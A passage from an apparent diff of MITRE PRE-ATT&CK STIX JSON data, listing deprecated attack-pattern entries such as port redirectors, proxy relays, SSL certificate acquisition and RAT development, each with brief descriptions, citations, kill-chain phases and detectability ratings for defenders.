"x_mitre_old_attack_id": "PRE-T1123", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--13ff5307-b650-405a-9664-d8076930b2bf", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Port redirector", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1363).\n\nRedirecting a communication request from one address and port number combination to another. May be set up to obfuscate the final location of communications that will occur in later stages of an attack. (Citation: SecureWorks HTRAN Analysis)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1363", + "external_id": "T1363" + }, + { + "source_name": "SecureWorks HTRAN Analysis", + "description": "JOE STEWART. (2011, August 3). HTran and the Advanced Persistent Threat. Retrieved March 28, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Infrastructure is (typically) outside of control/visibility of defender and as such as tools are staged for specific campaigns, it will not be observable to those being attacked.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary has control of the infrastructure and will likely be able to add/remove tools to infrastructure, whether acquired via hacking or standard computer acquisition (e.g., [https://aws.amazon.com AWS], VPS providers).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1140", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "stage-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--df42286d-dfbd-4455-bc9d-aef52ac29aa7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Post compromise tool development", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1353).\n\nAfter compromise, an adversary may utilize additional tools to facilitate their end goals. This may include tools to further explore the system, move laterally within a network, exfiltrate data, or destroy data. (Citation: SofacyHits)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1353", + "external_id": "T1353" + }, + { + "source_name": "SofacyHits", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary will likely use code repositories, but development will be performed on their local systems.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Post compromise tool development is a standard part of the adversary's protocol in developing the necessary tools required to completely conduct an attack.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1130", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--3160347f-11ac-44a3-9640-a648b3c17a8f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Private whois services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1305).\n\nEvery domain registrar maintains a publicly viewable database that displays contact information for every registered domain. Private 'whois' services display alternative information, such as their own company data, rather than the owner of the domain. (Citation: APT1)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1305", + "external_id": "T1305" + }, + { + "source_name": "APT1", + "description": "Mandiant. (n.d.). APT1: Exposing One of China\u2019s Cyber Espionage Units. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Algorithmically possible to detect COTS service usage or use of non-specific mailing addresses (PO Boxes, drop sites, etc.)", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Commercially available or easy to set up and/or register using a disposable email account.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1082", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--2141aea0-cf38-49aa-9e51-ac34092bc30a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Procure required equipment and software", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1335).\n\nAn adversary will require some physical hardware and software. They may only need a lightweight set-up if most of their activities will take place using on-line infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems. (Citation: NYTStuxnet)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1335", + "external_id": "T1335" + }, + { + "source_name": "NYTStuxnet", + "description": "William J. Broad, John Markoff, and David E. Sanger. (2011, January 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved March 1, 2017.", + "url": "https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1112", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Ease and availability of current hardware and software, mobile phones (cash and go phones), and additional online technology simplifies adversary process to achieve this technique (and possibly without traceability). The adversary has control of the infrastructure and will likely be able to add/remove tools to infrastructure, whether acquired via hacking or standard computer acquisition (e.g., [https://aws.amazon.com AWS], VPS).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Outside of highly specific or rare HW, nearly impossible to detect and track.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--b14f6692-b613-44bb-9f30-8381a5ff10d5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Proxy/protocol relays", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1304).\n\nProxies act as an intermediary for clients seeking resources from other systems. Using a proxy may make it more difficult to track back the origin of a network communication. (Citation: APT1)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1304", + "external_id": "T1304" + }, + { + "source_name": "APT1", + "description": "Mandiant. (n.d.). APT1: Exposing One of China\u2019s Cyber Espionage Units. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defenders with standard capabilities will traditionally be able to see the first hop but not all the subsequent earlier hops an adversary takes to be able to conduct reconnaissance.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Proxies are readily available for the adversary with both free and cost-based options available.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1081", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--702dc95d-3266-42dc-9eef-4a19e2445148", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Push-notification client-side exploit", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nA technique to push an [iOS](https://www.apple.com/ios) or [Android](https://www.android.com) MMS-type message to the target which does not require interaction on the part of the target to be successful. (Citation: BlackHat Stagefright) (Citation: WikiStagefright)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1373", + "url": "https://attack.mitre.org/techniques/T1373" + }, + { + "description": "Joshua Drake. (2015, August 5). Stagefright: Scary Code in the Heart of Android. Retrieved March 29, 2017.", + "source_name": "BlackHat Stagefright" + }, + { + "description": "Wikipedia contributors. (2017, March 8). Stagefright (bug). Retrieved March 9, 2017.", + "source_name": "WikiStagefright" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:22:23.446Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1150", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Easily executed technique to push an MMS-type message to the target which does not require interaction on the part of the target to be successful.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "For non-corporate cellular devices not joined to the corporate network, it is not possible to detect an adversary's use of the technique because messages traverse networks outside of the control of the employer. For corporate cellular devices which are joined to the corporate network, monitoring of messages and ability to patch against push attacks is possible, assuming they are fully monitored.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + }, + { + "id": "attack-pattern--acfcbe7a-4dbc-4471-be2b-134faf479e3e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Receive KITs/KIQs and determine requirements", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1239).\n\nApplicable agencies and/or personnel receive intelligence requirements and evaluate them to determine sub-requirements related to topics, questions, or requirements. For example, an adversary's nuclear energy requirements may be further divided into nuclear facilities versus nuclear warhead capabilities. (Citation: AnalystsAndPolicymaking)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1239", + "external_id": "T1239" + }, + { + "source_name": "AnalystsAndPolicymaking", + "description": "Jack Davis. (2002, September). Improving CIA Analytic Performance: Analysts and the Policymaking Process. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1016", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-direction" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--7863b7f1-c18a-4aad-a6cf-4aa6d8797531", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Receive operator KITs/KIQs tasking", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1235).\n\nAnalysts may receive intelligence requirements from leadership and begin research process to satisfy a requirement. Part of this process may include delineating between needs and wants and thinking through all the possible aspects associating with satisfying a requirement. (Citation: FBIIntelligencePrimer)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1235", + "external_id": "T1235" + }, + { + "source_name": "FBIIntelligencePrimer", + "description": "FBI. (n.d.). Intelligence Branch: Intelligence Primer. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1012", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--9755ecdc-deb0-40e6-af49-713cb0f8ed92", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Remote access tool development", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1351).\n\nA remote access tool (RAT) is a piece of software that allows a remote user to control a system as if they had physical access to that system. An adversary may utilize existing RATs, modify existing RATs, or create their own RAT. (Citation: ActiveMalwareEnergy)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1351", + "external_id": "T1351" + }, + { + "source_name": "ActiveMalwareEnergy", + "description": "Dan Goodin. (2014, June 30). Active malware operation let attackers sabotage US energy industry. Retrieved March 9, 2017.", + "url": "https://arstechnica.com/information-technology/2014/06/active-malware-operation-let-attackers-sabotage-us-energy-industry/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1128", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Many successful RATs exist for re-use/tailoring in addition to those an adversary may choose to build from scratch. The adversary's capabilities, target sensitivity, and needs will likely determine whether a previous RAT is modified for use a new one is built from scratch.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary will likely use code repositories, but development will be performed on their local systems.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--0d759854-9b69-438c-8325-74b03cc80cf0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Replace legitimate binary with malware", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nReplacing a legitimate binary with malware can be accomplished either by replacing a binary on a legitimate download site or standing up a fake or alternative site with the malicious binary. The intent is to have a user download and run the malicious binary thereby executing malware. (Citation: FSecureICS)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1378", + "url": "https://attack.mitre.org/techniques/T1378" + }, + { + "description": "Daavid and Antti. (2014, June 23). Havex Hunts For ICS/SCADA Systems. Retrieved March 9, 2017.", + "source_name": "FSecureICS" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:23:46.977Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1155", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Requires the adversary to replace a binary on a website where users will download the binary (e.g., patch, firmware update, software application) as innately trusted. The additional challenge is the reduced set of vendor-trusted websites that are vulnerable.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_detectable_by_common_defenses_explanation": "On the host end user system, integrity checking (e.g., hash verification, code signing enforcement), application whitelisting, sandboxing, or behavioral-based/heuristic-based systems are most likely to be successful in detecting this technique. On the source webserver, detecting binary changes is easy to detect if performed.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + }, + { + "id": "attack-pattern--abd5bed1-4c12-45de-a623-ab8dc4ff862a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Research relevant vulnerabilities/CVEs", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1291).\n\nCommon Vulnerability Enumeration (CVE) is a dictionary of publicly known information about security vulnerabilities and exposures. An adversary can use this information to target specific software that may be vulnerable. (Citation: WeaponsVulnerable) (Citation: KasperskyCarbanak)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1291", + "external_id": "T1291" + }, + { + "source_name": "WeaponsVulnerable", + "description": "Jack Smith IV. (2015, January 22). Pentagon Chief Weapons Tester: Almost All Military Programs Vulnerable to Cyber-Attacks. Retrieved March 5, 2017." + }, + { + "source_name": "KasperskyCarbanak", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved March 27, 2017.", + "url": "https://securelist.com/the-great-bank-robbery-the-carbanak-apt/68732/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1068", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Using standard headers/fingerprints from normal traffic, it is often trivial to identify the SW or HW the target is running, which can be correlated against known CVEs and exploit packages.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Public source external to the defender's organization.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--b26babc7-9127-4bd5-9750-5e49748c9be3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Research visibility gap of security vendors", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1290).\n\nIf an adversary can identify which security tools a victim is using they may be able to identify ways around those tools. (Citation: CrowdStrike Putter Panda)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1290", + "external_id": "T1290" + }, + { + "source_name": "CrowdStrike Putter Panda", + "description": "Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.", + "url": "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Public source external to the defender's organization.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Requires in-depth research and potentially other intrusions, requires unbounded amount of work to possibly find a return on investment", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1067", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--a16e4004-caac-4a0b-acd5-486f8fda1665", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Review logs and residual traces", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1358).\n\nExecution of code and network communications often result in logging or other system or network forensic artifacts. An adversary can run their code to identify what is recorded under different conditions. This may result in changes to their code or adding additional actions (such as deleting a record from a log) to the code. (Citation: EDB-39007) (Citation: infosec-covering-tracks)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1358", + "external_id": "T1358" + }, + { + "source_name": "EDB-39007", + "description": "Tavis Ormandy and Natalie Silvanovich. (2015, December 16). FireEye - Wormable Remote Code Execution in MIP JAR Analysis. Retrieved March 9, 2017." + }, + { + "source_name": "infosec-covering-tracks", + "description": "Infosec Institute. (2015, September 9). Covering Tracks of Attacks. Retrieved May 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary controls the test and defender likely has no visibility.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary has full control of environment to determine what level of auditing and traces exist on a system after execution.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1135", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "test-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--41086474-e6de-4fac-bb69-640db7fdf3d2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Runtime code download and execution", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nMany mobile devices are configured to only allow applications to be installed from the mainstream vendor app stores (e.g., Apple App Store and Google Play Store). These app stores scan submitted applications for malicious behavior. However, applications can evade these scans by downloading and executing new code at runtime that was not included in the original application package. (Citation: Fruit vs Zombies) (Citation: Android Hax) (Citation: Execute This!) (Citation: HT Fake News App) (Citation: Anywhere Computing kill 2FA) (Citation: Android Security Review 2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1395", + "url": "https://attack.mitre.org/techniques/T1395" + }, + { + "description": "Claud Xiao. (2016). Fruit vs Zombies: Defeat Non-jailbroken iOS Malware. Retrieved April 12, 2017.", + "source_name": "Fruit vs Zombies" + }, + { + "description": "Jon Oberheide. (2010). Android Hax. Retrieved April 12, 2017.", + "source_name": "Android Hax" + }, + { + "description": "Sebastian Poeplau, Yanick Fratantonio, Antonio Bianchi, Christopher Kruegel, Giovanni Vigna. (2014). Execute This! Analyzing Unsafe and Malicious Dynamic Code Loading in Android Applications. Retrieved April 12, 2017.", + "source_name": "Execute This!" + }, + { + "description": "Wish Wu. (2016, July 15). Fake News App in Hacking Team Dump Designed to Bypass Google Play. Retrieved April 12, 2017.", + "source_name": "HT Fake News App" + }, + { + "description": "Radhesh Krishnan Konoth, Victor van der Veen and Herbert Bos. (2016). How Anywhere Computing Just Killed Your Phone-Based Two-Factor Authentication. Retrieved April 12, 2017.", + "source_name": "Anywhere Computing kill 2FA" + }, + { + "description": "Google. (2016, April). Android Security 2015 Year In Review. Retrieved April 12, 2017.", + "source_name": "Android Security Review 2015" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:24:50.384Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1172", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Runtime code execution techniques and examples of their use are widely documented on both Apple iOS and Android.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Third-party mobile application security analysis services exist that scan for use of these techniques in iOS and Android applications. Additionally, Google specifically calls out the ability to \"identify attacks that require connection to a server and dynamic downloading of code\" in its Android Security 2015 Year in Review report. However, many applications use these techniques as part of their legitimate operation, increasing the difficulty of detecting or preventing malicious use.", + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--e34b9ca1-8778-41a3-bba5-8edaab4076dc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "SSL certificate acquisition for domain", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1337).\n\nCertificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. Acquiring a certificate for a domain name similar to one that is expected to be trusted may allow an adversary to trick a user in to trusting the domain (e.g., vvachovia instead of [Wachovia](https://www.wellsfargo.com/about/corporate/wachovia) -- homoglyphs). (Citation: SubvertSSL) (Citation: PaypalScam)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1337", + "external_id": "T1337" + }, + { + "source_name": "SubvertSSL", + "description": "Ryan Singel. (2010, March 24). Law Enforcement Appliance Subverts SSL. Retrieved March 2, 2017." + }, + { + "source_name": "PaypalScam", + "description": "Bob Sullivan. (2000, July 24). PayPal alert! Beware the 'PaypaI' scam. Retrieved March 2, 2017.", + "url": "https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1114", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "SSL certificates are readily available at little to no cost.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Defender can monitor for domains similar to popular sites (possibly leverage [https://www.alexa.com Alexa] top ''N'' lists as starting point).", + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--54a42187-a20c-4e4e-ba31-8d15c9e1f57f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "SSL certificate acquisition for trust breaking", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1338).\n\nFake certificates can be acquired by legal process or coercion. Or, an adversary can trick a Certificate Authority into issuing a certificate. These fake certificates can be used as a part of Man-in-the-Middle attacks. (Citation: SubvertSSL)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1338", + "external_id": "T1338" + }, + { + "source_name": "SubvertSSL", + "description": "Ryan Singel. (2010, March 24). Law Enforcement Appliance Subverts SSL. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "The certificate authority who is hacked cannot easily see they've been compromised, but [https://www.google.com Google] has caught on to this occurring in previous attacks such as DigiNotarDigiNotar2016 and [https://www.verisign.com Verisign].", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "One example of it occurring in the real world is the DigiNotarDigiNotar2016 case. To be able to do this usually requires sophisticated skills and is traditionally done by a nation state to spy on its citizens.", + "x_mitre_version": "1.0", + 